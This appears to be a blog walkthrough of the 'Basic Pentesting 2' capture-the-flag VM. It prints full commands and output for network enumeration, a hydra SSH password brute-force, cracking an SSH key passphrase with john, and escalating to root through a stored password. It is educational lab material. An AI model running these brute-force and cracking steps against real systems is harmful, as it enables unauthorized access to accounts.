Basic Pentesting 2 Walkthrough
This is a boot2root VM and is a continuation of the Basic Pentesting series. This series is designed to help newcomers to penetration testing develop pentesting skills and have fun exploring part of the offensive side of security.
VirtualBox is the recommended platform for this challenge (though it should also work with VMware — however, I haven’t tested that).
This VM is a moderate step up in difficulty from the first entry in this series. If you’ve solved the first entry and have tried a few other beginner-oriented challenges, this VM should be a good next step. Once again, this challenge contains multiple initial exploitation vectors and privilege escalation vulnerabilities.
Your goal is to remotely attack the VM, gain root privileges, and read the flag located at /root/flag.txt. Once you’ve finished, try to find other vectors you might have missed!
The result of the initial port scan with nmap:
root@kali:~# nmap -A -p 1-65535 192.168.43.170
Nmap scan report for basic2 (192.168.43.170)
Host is up (0.00021s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/9.0.7
MAC Address: 08:00:27:A1:01:12 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m33s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
|_ start_date: N/ATRACEROUTE
HOP RTT ADDRESS
1 0.21 ms basic2 (192.168.43.170)
Well, there are some interesting open ports. I think the samba service is particularly interesting and enum4linux is an excellent tool to do the enumeration for us:
root@kali:~# enum4linux 192.168.43.170
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ )==========================
| Target Information |
==========================
Target ........... 192.168.43.170
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none======================================================
| Enumerating Workgroup/Domain on 192.168.43.170 |
======================================================
[+] Got domain/workgroup name: WORKGROUP==============================================
| Nbtstat Information for 192.168.43.170 |
==============================================
Looking up status of 192.168.43.170
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service ElectionsMAC Address = 00-00-00-00-00-00=======================================
| Session Check on 192.168.43.170 |
=======================================
[+] Server 192.168.43.170 allows sessions using username '', password ''=============================================
| Getting domain SID for 192.168.43.170 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup========================================
| OS information on 192.168.43.170 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.43.170 from smbclient:
[+] Got OS info for 192.168.43.170 from srvinfo:
BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
platform_id : 500
os version : 6.1
server type : 0x809a03===============================
| Users on 192.168.43.170 |
===============================
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.===========================================
| Share Enumeration on 192.168.43.170 |
===========================================
WARNING: The "syslog" option is deprecatedSharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.Server Comment
--------- -------Workgroup Master
--------- -------
WORKGROUP BASIC2[+] Attempting to map shares on 192.168.43.170
//192.168.43.170/Anonymous Mapping: OK, Listing: OK
//192.168.43.170/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*======================================================
| Password Policy Information for 192.168.43.170 |
======================================================[+] Attaching to 192.168.43.170 using a NULL share[+] Trying protocol 445/SMB...[+] Found domain(s):[+] BASIC2
[+] Builtin[+] Password Info for Domain: BASIC2[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes[+] Retieved partial password policy with rpcclient:Password Complexity: Disabled
Minimum Password Length: 5================================
| Groups on 192.168.43.170 |
================================[+] Getting builtin groups:[+] Getting builtin group memberships:[+] Getting local groups:[+] Getting local group memberships:[+] Getting domain groups:[+] Getting domain group memberships:====================================================================
| Users on 192.168.43.170 via RID cycling |
===================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2853212168-2008227510-3551253869
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''--- snip ---S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)--- snip ---[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)--- snip ---===============================================
| Getting printer info for 192.168.43.170 |
===============================================
No printers returned.
As you can see, I was able to identify 2 user on the system, kay and jan. Next, I run nikto on the webserver:
root@kali:~# nikto -h 192.168.43.170
- Nikto v2.1.6
--------------------------------------------------------------------
+ Target IP: 192.168.43.170
+ Target Hostname: 192.168.43.170
+ Target Port: 80
--------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x9e 0x56a870fbc8f28
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host
--------------------------------------------------------------------
+ 1 host(s) testedThere was an interesting directory called development, which contained 2 txt files.
2018-04-23: I've been messing with that struts stuff, and it's pretty cool!
I think it might be neat to host that on this server too. Haven't made any real web
apps yet, but I have tried that example you get to show off how it works (and it's
the REST version of the example!). Oh, and right now I'm using version 2.5.12,
because other versions were giving me trouble. -K2018-04-22: SMB has been configured. -K2018-04-21: I got Apache set up. Will put in our content later. -JFor J:I've been auditing the contents of /etc/shadow to make sure we don't have any weak
credentials, and I was able to crack your hash really easily. You know our password
policy, so please follow it? Change that password ASAP.-K
Now, I knew that jay had a weak password and SSH is running, so I tried to brute-force it with hydra:
root@kali:~# hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.170
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.Hydra (http://www.thc.org/thc-hydra)
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.43.170:22/
[STATUS] 263.00 tries/min, 263 tries in 00:01h, 14344143 to do in 909:01h, 16 active
[STATUS] 247.67 tries/min, 743 tries in 00:03h, 14343663 to do in 965:16h, 16 active
[22][ssh] host: 192.168.43.170 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Success! I got the password for jan. I logged in via SSH and started exploring the server. After several failed kernel exploit attempt, I decided to explore kay’s home directory. I tried loggin in as kay, but couldn’t guess the password. I discovered that I can access the .ssh directory and all of its content. SSH login with private also failed, because it required a password. I used john to crack the ssh password:
root@kali:~/Downloads# ssh2john key.txt > crackme
root@kali:~/Downloads# john crackme
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:38 3/3 0g/s 486702p/s 486702c/s 486702C/s tboits
0g 0:00:01:33 3/3 0g/s 517783p/s 517783c/s 517783C/s bhab146
0g 0:00:04:24 3/3 0g/s 532364p/s 532364c/s 532364C/s k11kv3
0g 0:00:07:19 3/3 0g/s 534969p/s 534969c/s 534969C/s ffieb17
0g 0:00:25:41 3/3 0g/s 542544p/s 542544c/s 542544C/s hsfemg
0g 0:00:34:47 3/3 0g/s 543421p/s 543421c/s 543421C/s kj1ja7
0g 0:00:52:24 3/3 0g/s 543436p/s 543436c/s 543436C/s lbi2alu
beeswax (key.txt)
1g 0:00:59:31 DONE 3/3 0.000279g/s 543394p/s 543394c/s 543394C/s beeswax
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Downloads# john crackme --show
key.txt:beeswax1 password hash cracked, 0 left
Another user was in the bag, only the root user missing. But, since there was password in kay’s home folder, I thought it might help me get root.
root@kali:~/Downloads# ssh -i key.txt kay@192.168.43.170
Enter passphrase for key 'key.txt':
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage128 packages can be updated.
66 updates are security updates.New release '18.04.1 LTS' available.
Run 'do-release-upgrade' to upgrade to it.kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$
I was right, kay was able switch to root user with this password.
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
kay@basic2:~$ sudo -s
[sudo] password for kay:
root@basic2:~#Now, I got root and the flag was:
Congratulations! You’ve completed this challenge. There are two ways (that I’m aware of) to gain a shell, and two ways to privesc. I encourage you to find them all!
If you’re in the target audience (newcomers to pentesting), I hope you learned something. A few takeaways from this challenge should be that every little bit of information you can find can be valuable, but sometimes you’ll need to find several different pieces of information and combine them to make them useful. Enumeration is key! Also, sometimes it’s not as easy as just finding an obviously outdated, vulnerable service right away with a port scan (unlike the first entry in this series). Usually you’ll have to dig deeper to find things that aren’t as obvious, and therefore might’ve been overlooked by administrators.
Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you’ll send me a link! I can be reached at josiah@vt.edu. If you’ve got questions or feedback, please reach out to me.
Happy hacking!
Before you go…
Thank you for taking the time to read my walkthrough. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏
